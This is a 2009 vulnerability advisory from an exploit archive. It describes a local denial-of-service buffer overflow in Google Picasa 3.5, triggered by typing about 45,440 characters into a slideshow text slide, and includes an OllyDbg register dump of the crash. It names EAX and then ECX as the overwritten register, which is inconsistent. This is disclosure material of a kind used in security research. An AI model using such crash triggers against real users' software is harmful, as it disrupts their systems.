Google Picasa 3.5 Local DoS Buffer Overflow

2009-12-16T00:00:00
ID 1337DAY-ID-9801
Type zdt
Reporter Connection
Modified 2009-12-16T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            ===========================================
Google Picasa 3.5 Local DoS Buffer Overflow
===========================================

# Title: Google Picasa 3.5 Local DoS Buffer Overflow
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Connection
# Published: 2009-12-16
# Verified: yes

view source
print?
Connection of the HackTalk team recently found a buffer overflow in the Picasa software by Google.  Below is the write up.
 
Pentest Information:
====================
Connection has discovered a Buffer Overflow in Picasa 3.5 created by Google.
An attacker is able to overflow the EAX register by creating a text slide with a large block of text.
 
Details
=======
Tested on OS: Windows XP & Windows Vista
Tested with Software: Debugger & Picasa 3.5
 
Vulnerable Products: Picasa
Affected Versions: 3.5
Vulnerability Type: Buffer Overflow
Security-Risk: Low
 
Vendor-URL: http://picasa.google.com
Preview-URL:
 
Vendor-Status: Uninformed
Patch/Fix-Status: Fixed version not released
Advisory-Status: Published | 29.09.2009
 
Advisory-URL:
Report-URL:
 
Introduction:
=============
Picasa is free photo editing software from Google that makes your pictures look great.
Sharing your best photos with friends and family is as easy as pressing a button! ss.
 
(from the vendors homepage: http://picasa.google.com)
 
More Details:
=============
Due to the lack of input validation, an attacker is able to overwrite the ECX register and crash the program.
 
Proof of Concept:
=================
Open up Picasa and go to the movie creator. Add a new text slide and input 45440 characters. This will cause the program to crash. The following the the register dump from OllyDBG.
 
EAX 04875910 ASCII “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 0000007D
EDX 00000000
EBX 049364D0 ASCII “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 00129C1C
EBP 00129C24
ESI 04939B50 ASCII “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDI 04878F90 ASCII “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA”
EIP 0098C13E Picasa3.0098C13E
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty 23.500000000000000000
ST1 empty 19.000000000000000000
ST2 empty 19.000000000000000000
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 1.0000000000000000000
ST6 empty 0.0
ST7 empty 0.0
3 2 1 0      E S P U O Z D I
FST 0020  Cond 0 0 0 0  Err 0 0 1 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
 
Security Risk:
==============
An attacker may crash Picasa by inputting a large block of text into a slide in the slideshow maker function of Picasa. The security risk is estimated as low.
 
Author:
=======
The Author & Writer is a part of the HackTalk team.
~Connection



#  0day.today [2018-04-01]  #